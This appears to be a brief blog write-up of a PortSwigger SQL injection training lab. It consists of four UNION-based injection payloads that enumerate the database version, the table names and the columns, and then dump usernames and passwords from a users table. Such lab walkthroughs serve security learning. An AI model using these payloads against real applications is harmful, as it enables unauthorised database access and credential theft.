Portswigger SQLi-Lab 7

SQL injection attack, listing the database contents on non-Oracle databases

Gifts' union select version(),null --
Gifts' union select table_name,null from information_schema.tables --
Gifts' union select column_name,null from information_schema.columns where table_name='users_bkrkxr' --
Gifts' union select username_lshein,password_adqjqk from users_bkrkxr --




Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to Connect MetaMask to OEC Chain

Xcode unit tests with ⌘+S

The Art of Flexbox

Radek Holý: Python is a matter of my heart

Deploying secure S3 buckets using CloudFormation

Python Algorithm Pt.9: Dijkstra

Ecosystem AMA — March 16th, 2022

5 Tips To Beat the LeetCode Grind

Man tying his laces

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Pentester | CTF Player

More from Medium

Root me Walkthrough(THM)

Day 7: Cross site scripting (XSS)

SQL injection Union attack: Determining the number of columns required in an SQL injection UNION…

Fawn Walkthrough